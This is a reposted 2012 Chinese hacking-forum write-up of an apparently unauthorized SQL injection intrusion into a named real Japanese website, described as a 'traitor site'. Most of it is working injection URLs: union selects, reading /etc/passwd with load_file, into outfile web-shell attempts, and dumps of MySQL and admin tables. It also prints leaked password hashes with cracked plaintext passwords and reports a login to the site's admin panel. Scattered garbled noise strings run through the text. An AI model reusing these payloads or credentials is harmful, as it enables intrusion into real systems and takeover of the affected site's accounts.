中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试
. L1 n! e- ~& \# [% Y
: ~5 `6 u  a! ^6 R# p2 R
0x01. 检测 www.zuaa.jp 收集数据3 J5 A  L$ v1 R/ k# T
[attach]73[/attach]7 c" T6 z( M, m2 J7 p

5 ~+ W# e) m9 L, [' Iwhatweb- V5 r* [' B) ]7 N3 n2 t/ a- E
[attach]74[/attach]
. K& r/ n* h! W8 g# z
! Y3 m9 ]5 R" {# ^9 s6 I' n利用NMAP扫描
/ E: Q2 A/ y, A, Q, P8 \; T6 X[attach]75[/attach]
( b; j7 k8 O. v$ ?" \( C中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; T0 i0 {; i/ h* k
0x02.找注入点
, k4 i: [9 x; K/ O( O找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3903 d3 h8 w2 p  x; Y
[attach]76[/attach]
8 {6 e3 K% e' A# }( y2 f2 R$ R: e- I
. N+ n5 _  {4 i, k0x03.order by( t4 d- ~' n/ z
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1$ K) v4 T' W! }. X3 H$ _% P
[attach]77[/attach]
5 A& |# d; E! Z: f4 rorder by 28报错,order by 27正常
3 o' M  V  m- N$ r5 z
! ^! o3 k0 m& Y( D4 B8 Q0x04.   union手动查询
% K8 ~: t) W: g* l% h/ c8 dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : R# K! o- K; o! T3 S
添加到 27 时正常显示 . J( p. v0 n5 R: X% e
[attach]78[/attach]
: [  y5 E1 |0 ~% c/ K中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; v2 `. t7 v- J! C/ A$ ~
/ R  @' N" b" p, P* _, K' I/ |
0x05. info:  W5 @+ z: a9 b: A$ _% }+ w# M
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 J, A% d3 h+ B$ m( P[attach]79[/attach]
+ b7 H3 i8 s9 H& G4 Z, Juser:            root@localhost/ r. s+ n& [9 G
database:    openpne
+ L" v9 H" Z, G3 Y, g5 ~. pversion:      4.1.22, l" |& N& I: H; Y: c1 A
os:             portbld-freebsd5.4
1 k/ O' C+ d9 c  {, ]8 `. @- I' |  {' h0 t- E% t# }
0x06. root用户
; F1 F1 m) N1 c利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
/ A3 c& ^7 z9 H3 bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( T8 `+ R- F, P9 w! c[attach]80[/attach]3 A! H- Z. W( N8 k( I6 _- Y& e
通过工具转换( A8 l) V& B9 k
[attach]81[/attach]
/ I0 S; d* W4 k& K. X' i9 g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 W1 ]( d" H* g

. o$ U' p6 k) j4 G9 j. D" _! D0x07. 利用 into outfile. a6 A) Z8 F* l
全部都失败' E4 L# n# a. e4 v: o" l
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% J9 J& b0 c% Z5 s$ R- V* H. O; V# v/ @
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php . n. T; Q3 W) Z) w( x# l
; h4 B) Z2 @2 F
页面显示“MDB2 Error:syntax error”5 V4 f5 y3 K( o- u4 |& K# V' N

( G1 Q$ p; Y, {# K0x08. 利用 mysql 4.1* _$ @; S# @6 _; W
猜常规表名,字段未果 工具 sqlmap
, Y: K! W' N! B$ Z3 M* ?& [8 g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 u6 e- k# h2 z1 _
/ K2 p+ ]# l! e; O7 k- T5 k
[attach]82[/attach]3 \. z; E* ?7 I) y% a/ T
% e* e2 J: @" @! X6 M2 [9 Z4 s' X
0x09. 查找后台
* x) J0 h9 w/ B8 A6 S利用 现有的各种 后台工具尝试都不行$ \! H. q; p$ \( a' q% I
: F7 a& K! z, Q+ P) m4 N
0x10.  MySL外联方法) {$ j  k4 _. d* ~/ q: Q- ?
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行) W6 P9 j- p/ M7 Q% X) X7 m
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
6 ~+ P- l# ~& t! o- qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user$ \1 ^+ _6 k: K' |9 S# x
[attach]83[/attach]1 j: @- P- [& R
这个可以在 www.cmd5.com 解密6 g* J% a2 y" h) Q7 }
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
- p, p+ W7 R* O6 S2 l% }chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
, V0 y) {( ~7 W* n5 Vopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( R. X* ^6 F2 u/ e2 Gzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???- ~2 |. U% s0 w& `3 x8 X, w4 M+ _
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
( c/ d: o5 S( I: v, m[attach]84[/attach]% J/ @; r0 H4 g  C3 O3 I# p
; R2 ?& ?% ?# ~
0x11. 网站突破
0 q0 O" d; y$ c: a% B& `发现网站的源程序 openpne, google 下载 openpne 源码, @$ W2 w: F& j
[attach]85[/attach]
8 y' |/ A4 H/ W0 A
" J- a% c" F2 U0 u5 _5 i% ~% y0x12. 默认信息利用
& U5 ]0 u: b8 ahttp://sns.zuaa.jp/?m=admin&a=page_login
9 p  X* @0 b" d  W[attach]86[/attach]" Q6 ~1 J2 F" W) A; u# C8 D& ?, g
表名 (c_admin_user) ,字段名(username,password)! l0 L2 e; n7 D% i9 ]
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user1 Y4 X2 l! r0 Q& a# g6 B
[attach]87[/attach]
/ `) ]1 h- B+ G0 Z) q- R1 m解密
; ~( J8 ?( u0 E1 m4 S. d$ Rzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
  x8 C8 O* r! }zuaajp:c0923ec5857796a393da99905008c176,          zju1897, U: u3 u$ x* m( K

- ~3 N" i4 o1 D& K6 v中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 ^' L5 j, e1 S. g

2 L3 L; y" r' C: B) H0x13. 登录后台. Y( e) S! ~5 j$ _. E
[attach]88[/attach]
5 F8 d7 C) Y! `) a6 T1 e9 {, D2 Z3 D5 M! e, \

* [7 n* m& _( A9 y. Q! b  v0x14. 小结4 j* a/ N# [' t" ^* I9 x
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# d6 [3 f: y, l# o4 @感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
/ f- q9 H" o7 Z1 Q& `------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
& v- Z. d8 W1 D( o" C5 }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* ^4 P7 L* }8 l6 q1 e, m8 y
* e& k& W% |% ~- q0 Q最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!; {8 B/ }& y7 F1 E- s) \

作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2